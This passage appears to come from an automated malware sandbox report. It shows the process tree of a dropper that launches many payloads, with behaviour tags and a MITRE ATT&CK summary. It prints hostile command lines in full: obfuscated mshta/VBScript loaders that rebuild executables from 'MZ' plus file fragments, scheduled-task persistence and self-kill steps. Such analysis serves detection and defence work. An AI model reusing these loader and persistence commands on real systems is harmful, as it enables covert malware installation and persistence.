  Command line: C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue195c40958f528163.exe
  - Executes dropped EXE
  PID: 5580

Level 5: C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c Tue19f51bcd77a.exe
  PID: 3784

Level 6: C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19f51bcd77a.exe
  Command line: Tue19f51bcd77a.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID: 2520

Level 7: C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19f51bcd77a.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19f51bcd77a.exe
  - Executes dropped EXE
  PID: 5552

Level 7: C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19f51bcd77a.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19f51bcd77a.exe
  - Executes dropped EXE
  PID: 5832

Level 7: C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19f51bcd77a.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19f51bcd77a.exe
  - Executes dropped EXE
  PID: 6116

Level 5: C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c Tue19c06f159e0ec.exe
  PID: 4892

Level 6: C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19c06f159e0ec.exe
  Command line: Tue19c06f159e0ec.exe
  - Executes dropped EXE
  PID: 4828

Level 7: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4828 -s 300
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID: 2264

Level 5: C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c Tue1993b3f72c.exe
  PID: 3088

Level 6: C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue1993b3f72c.exe
  Command line: Tue1993b3f72c.exe
  - Executes dropped EXE
  PID: 4452

Level 5: C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c Tue19150ee2be694c8a4.exe /mixone
  PID: 3416

Level 6: C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19150ee2be694c8a4.exe
  Command line: Tue19150ee2be694c8a4.exe /mixone
  - Executes dropped EXE
  PID: 3104

Level 7: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 300
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID: 416

Level 5: C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c Tue19b4ef3b53293fe.exe
  PID: 1564

Level 6: C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19b4ef3b53293fe.exe
  Command line: Tue19b4ef3b53293fe.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID: 4648

Level 7: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4648 -s 1960
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID: 3236

Level 5: C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c Tue1969586bcbf58493.exe
  PID: 3184

Level 6: C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue1969586bcbf58493.exe
  Command line: Tue1969586bcbf58493.exe
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID: 3812

Level 7: C:\Users\Admin\Pictures\Adobe Films\hz2zZEE1IO8UL8KkUIl_DiwJ.exe
  Command line: "C:\Users\Admin\Pictures\Adobe Films\hz2zZEE1IO8UL8KkUIl_DiwJ.exe"
  - Executes dropped EXE
  PID: 5684

Level 7: C:\Users\Admin\Pictures\Adobe Films\lmuaIti549S4IlfLGjOQ62Vi.exe
  Command line: "C:\Users\Admin\Pictures\Adobe Films\lmuaIti549S4IlfLGjOQ62Vi.exe"
  - Executes dropped EXE
  PID: 5232

Level 8: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5232 -s 296
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID: 5648

Level 7: C:\Users\Admin\Pictures\Adobe Films\bogAMCgr_ceyHDpTDqaFFCso.exe
  Command line: "C:\Users\Admin\Pictures\Adobe Films\bogAMCgr_ceyHDpTDqaFFCso.exe"
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  PID: 440

Level 7: C:\Users\Admin\Pictures\Adobe Films\dKb7nc_82MUnYJcIwvnENgPK.exe
  Command line: "C:\Users\Admin\Pictures\Adobe Films\dKb7nc_82MUnYJcIwvnENgPK.exe"
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID: 5384

Level 8: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
  - Creates scheduled task(s)
  PID: 4508

Level 8: C:\Windows\SysWOW64\schtasks.exe
  Command line: schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
  - Creates scheduled task(s)
  PID: 2620

Level 7: C:\Users\Admin\Pictures\Adobe Films\PzZpKoEf4kqLrhhG_T7hkMOE.exe
  Command line: "C:\Users\Admin\Pictures\Adobe Films\PzZpKoEf4kqLrhhG_T7hkMOE.exe"
  - Executes dropped EXE
  PID: 904

Level 7: C:\Users\Admin\Pictures\Adobe Films\OXLD9voH55f6gEm9L6axlvDX.exe
  Command line: "C:\Users\Admin\Pictures\Adobe Films\OXLD9voH55f6gEm9L6axlvDX.exe"
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID: 4684

Level 7: C:\Users\Admin\Pictures\Adobe Films\Xhhrp4rIfn8tBtFfUngVP_kE.exe
  Command line: "C:\Users\Admin\Pictures\Adobe Films\Xhhrp4rIfn8tBtFfUngVP_kE.exe"
  - Executes dropped EXE
  PID: 3552

Level 8: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 272
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID: 6028

Level 5: C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c Tue19761b3b8d9d.exe
  PID: 2216

Level 6: C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19761b3b8d9d.exe
  Command line: Tue19761b3b8d9d.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID: 3988

Level 7: C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19761b3b8d9d.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19761b3b8d9d.exe
  - Executes dropped EXE
  PID: 5560

Level 5: C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c Tue19c1338f41ab.exe
  PID: 5076

Level 6: C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19c1338f41ab.exe
  Command line: Tue19c1338f41ab.exe
  - Executes dropped EXE
  PID: 4896

Level 7: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 308
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID: 3448

Level 5: C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c Tue19c78ded4d176ac.exe
  PID: 3484

Level 6: C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19c78ded4d176ac.exe
  Command line: Tue19c78ded4d176ac.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID: 3332

Level 5: C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c Tue19411ac950924ec3f.exe
  PID: 4016

Level 6: C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19411ac950924ec3f.exe
  Command line: Tue19411ac950924ec3f.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID: 3304

Level 7: C:\Users\Admin\AppData\Roaming\8274515.exe
  Command line: "C:\Users\Admin\AppData\Roaming\8274515.exe"
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID: 5740

Level 7: C:\Users\Admin\AppData\Roaming\4775154.exe
  Command line: "C:\Users\Admin\AppData\Roaming\4775154.exe"
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID: 2052

Level 7: C:\Users\Admin\AppData\Roaming\6218320.exe
  Command line: "C:\Users\Admin\AppData\Roaming\6218320.exe"
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID: 2288

Level 7: C:\Users\Admin\AppData\Roaming\7042039.exe
  Command line: "C:\Users\Admin\AppData\Roaming\7042039.exe"
  PID: 5948

Level 8: C:\Windows\SysWOW64\mshta.exe
  Command line: "C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Roaming\7042039.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Roaming\7042039.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))
  PID: 3836

Level 9: C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Roaming\7042039.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Roaming\7042039.exe" ) do taskkill -f -Im "%~NXZ"
  PID: 2644

Level 10: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill -f -Im "7042039.exe"
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID: 5224

Level 10: C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe
  Command line: ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i
  - Executes dropped EXE
  PID: 1540

Level 11: C:\Windows\SysWOW64\mshta.exe
  Command line: "C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF ""-P1jBMdKQQ16j1dp4oT~i "" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))
  PID: 2752

Level 12: C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "-P1jBMdKQQ16j1dp4oT~i " == "" for %Z iN ( "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ) do taskkill -f -Im "%~NXZ"
  PID: 4008

Level 11: C:\Windows\SysWOW64\mshta.exe
  Command line: "C:\Windows\System32\mshta.exe" VBSCRipT: CLOse ( createoBJECt ( "wScRIpt.shelL" ).RUn ("cMd /C EChO | SEt /p = ""MZ"" > CPkPI.i & CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K & Del /Q * " , 0 ,tRue ) )
  PID: 1300

Level 12: C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\System32\cmd.exe" /C EChO | SEt /p = "MZ" > CPkPI.i &CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K &Del /Q *
  PID: 1560

Level 13: C:\Windows\System32\Conhost.exe
  Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  PID: 3240

Level 13: C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>CPkPI.i"
  PID: 5836

Level 13: C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /S /D /c" EChO "
  - Blocklisted process makes network request
  PID: 4648

Level 13: C:\Windows\SysWOW64\control.exe
  Command line: control ..\WfNRfms4.K
  - Executes dropped EXE
  PID: 5948

Level 14: C:\Windows\SysWOW64\rundll32.exe
  Command line: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\WfNRfms4.K
  - Loads dropped DLL
  PID: 6000

Level 15: C:\Windows\system32\RunDll32.exe
  Command line: C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\WfNRfms4.K
  PID: 3796

Level 16: C:\Windows\SysWOW64\rundll32.exe
  Command line: "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\WfNRfms4.K
  - Loads dropped DLL
  PID: 3572

Level 7: C:\Users\Admin\AppData\Roaming\435056.exe
  Command line: "C:\Users\Admin\AppData\Roaming\435056.exe"
  - Executes dropped EXE
  - Adds Run key to start application
  PID: 5960

Level 8: C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
  Command line: "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
  - Executes dropped EXE
  PID: 4832

Level 7: C:\Users\Admin\AppData\Roaming\8581712.exe
  Command line: "C:\Users\Admin\AppData\Roaming\8581712.exe"
  - Executes dropped EXE
  PID: 3504

Level 5: C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c Tue192762f1cd058ddf8.exe
  PID: 3704

Level 6: C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue192762f1cd058ddf8.exe
  Command line: Tue192762f1cd058ddf8.exe
  - Executes dropped EXE
  PID: 2952

Level 5: C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c Tue193858933525b62.exe
  PID: 3668

Level 6: C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue193858933525b62.exe
  Command line: Tue193858933525b62.exe
  - Executes dropped EXE
  PID: 3316

Level 7: C:\Windows\SysWOW64\mshta.exe
  Command line: "C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue193858933525b62.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue193858933525b62.exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
  PID: 1648

Level 8: C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue193858933525b62.exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue193858933525b62.exe") do taskkill -iM "%~nXx" /f
  PID: 5448

Level 9: C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe
  Command line: ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ
  - Executes dropped EXE
  PID: 6012

Level 10: C:\Windows\SysWOW64\mshta.exe
  Command line: "C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
  PID: 6128

Level 11: C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f
  PID: 5336

Level 10: C:\Windows\SysWOW64\mshta.exe
  Command line: "C:\Windows\System32\mshta.exe" vBscrIpt: cLosE (cREatEObjEcT ( "wscript.sHeLl" ).Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+ y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 ,TruE ) )
  PID: 5732

Level 11: C:\Windows\SysWOW64\cmd.exe
  Command line: "C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E &Start msiexec -Y .\bENCc.E
  PID: 5272

Level 12: C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"
  PID: 5656

Level 12: C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /S /D /c" ECHO "
  PID: 3240

Level 12: C:\Windows\SysWOW64\msiexec.exe
  Command line: msiexec -Y .\bENCc.E
  - Loads dropped DLL
  PID: 4700

Level 9: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill -iM "Tue193858933525b62.exe" /f
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID: 6060

Level 5: C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c Tue19325eb008c0b950.exe
  PID: 4188

Level 5: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1952 -s 644
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious use of AdjustPrivilegeToken
  PID: 5156

Level 2: C:\Windows\SysWOW64\wlanext.exe
  Command line: "C:\Windows\SysWOW64\wlanext.exe"
  - Adds policy Run key to start application
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Modifies Internet Explorer settings
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  PID: 5792

Level 3: C:\Windows\SysWOW64\cmd.exe
  Command line: /c del "C:\Users\Admin\Pictures\Adobe Films\bogAMCgr_ceyHDpTDqaFFCso.exe"
  PID: 4724

Level 2: C:\Program Files (x86)\Y8pyhfft\lnz8vvkdnpkx.exe
  Command line: "C:\Program Files (x86)\Y8pyhfft\lnz8vvkdnpkx.exe"
  - Executes dropped EXE
  PID: 2564

Level 1: C:\Users\Admin\AppData\Local\Temp\7zS0450EC84\Tue19325eb008c0b950.exe
  Command line: Tue19325eb008c0b950.exe
  - Executes dropped EXE
  PID: 4840

Level 1: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1952 -ip 1952
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID: 840

Level 1: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4648 -ip 4648
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID: 5728

Level 1: C:\Windows\System32\WaaSMedicAgent.exe
  Command line: C:\Windows\System32\WaaSMedicAgent.exe a454731f9e1ab86af298c83b44bc0881 /wQZQ2ddR0eUW1NvDehkHw.0.1.0.3.0
  - Modifies data under HKEY_USERS
  PID: 5708

Level 1: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4828 -ip 4828
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID: 1816

Level 1: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5232 -ip 5232
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID: 4284

Level 1: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3552 -ip 3552
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID: 5952

Level 1: C:\Windows\system32\rundll32.exe
  Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process
  PID: 2292

Level 2: C:\Windows\SysWOW64\rundll32.exe
  Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Loads dropped DLL
  PID: 468

Level 1: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 904 -ip 904
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID: 3668

Level 1: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 468 -ip 468
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID: 4336

Level 1: C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  PID: 5360

Level 1: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3104 -ip 3104
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID: 5680

Level 1: C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
  - Checks processor information in registry
  PID: 4796

Level 2: C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
  Command line: C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
  PID: 2096

Level 2: C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
  Command line: C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
  PID: 5884

Level 1: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4896 -ip 4896
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID: 2500

Level 1: C:\Windows\System32\WaaSMedicAgent.exe
  Command line: C:\Windows\System32\WaaSMedicAgent.exe a454731f9e1ab86af298c83b44bc0881 /wQZQ2ddR0eUW1NvDehkHw.0.1.0.3.0
  - Modifies data under HKEY_USERS
  PID: 5236
Network
MITRE ATT&CK Enterprise v6
Persistence
- Modify Existing Service (1)
- Registry Run Keys / Startup Folder (3)
- Scheduled Task (1)
Defense Evasion
- Disabling Security Tools (1)
- Modify Registry (5)
- Virtualization/Sandbox Evasion (1)
- Web Service (1)